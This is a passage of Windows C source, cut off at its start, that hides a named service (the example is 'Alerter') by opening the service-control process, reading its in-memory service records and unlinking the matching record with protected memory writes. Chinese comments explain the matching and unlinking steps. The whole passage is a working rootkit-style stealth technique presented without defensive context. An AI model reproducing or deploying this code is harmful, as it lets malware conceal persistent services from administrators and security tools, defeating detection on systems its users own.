hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

if (NULL == hProcess)

{

printf("OpenProcess error:%d\r\n",GetLastError());

return FALSE;

}

pSvcRd = FindFirstServiceRecord(hProcess);

if (NULL == pSvcRd)

{

printf("FindFirstServiceRecord error\r\n");

CloseHandle(hProcess);

return FALSE;

}

do

{

if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&

ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))

{

//OutputDebugStringW(SvcName);

// 匹配服务名

memset(lpSvcName,0,sizeof(lpSvcName));

UnicodeToAnsiStr(lpSvcName,SvcName);

if (lstrcmpi(lpSvcName, Name) == NULL)

{

// 从链表中断开（一般来说ServiceRecord是可写的，但还是先改保护属性以防万一）

ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);

ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);

CloseHandle(hProcess);

return TRUE;

}

}

else

{

break;

}

}

while (pSvcRd = SvcRd.Next);

if( NULL != hProcess )

{

CloseHandle(hProcess);

}

return FALSE;

}

int main()

{

HideService("Alerter");

return 0;

}